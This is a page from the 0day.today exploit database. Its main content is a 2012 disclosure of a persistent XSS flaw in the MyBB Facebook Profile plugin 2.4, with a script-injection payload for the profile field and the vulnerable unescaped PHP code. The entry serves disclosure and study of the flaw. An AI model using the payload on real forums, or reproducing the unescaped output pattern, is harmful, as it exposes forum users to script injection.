0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MyBB Plugin 2.4 Facebook Profile Persistant XSS Vulnerability
# Exploit Title: MyBB Facebook Profile Plugin Persistant XSS # Date: 12/12/2012 # Exploit Author: limb0 # Vendor Homepage: http://www.collectiontricks.it/ # Software Link: http://mods.mybb.com/view/facebook-profile-link-on-postbit-2-2 # Version: 2.4 # Tested on: Linux ###################################P-XSS###################################### Installation: 1. Upload all folder to your MyBB installation directory. 2. Go to your Admin-CP and click Plugins. 3. Click Install & Activate. Configuration: User-CP >> Edit Profile >> Facebook id/nickname >> Type: "><script>alert(/limb0/)</script> Then visit one of your threads,and voila. Proofs: Configuration:http://postimage.org/image/sumvqlro7/ Testing:http://postimage.org/image/57tjltqb9/ -------------------------------Vulnerable Code--------------------------------------- Line 200-216 $post["iconfacebook"] = '<a href="http://www.facebook.com/' . $post["facebook"] .'" TARGET=_BLANK><img src="'.$mybb->settings['bburl'].'/images/facebook.gif' .'" /></a>'; } else { } } else { $post["iconfacebook"] = '<a href="http://www.facebook.com/' . $post["facebook"] .'" TARGET=_BLANK><img src="'.$mybb->settings['bburl'].'/images/facebook.gif' .'" /></a>'; } } This vulnerable is dedicated to my brothers. <3 # 0day.today [2024-11-15] #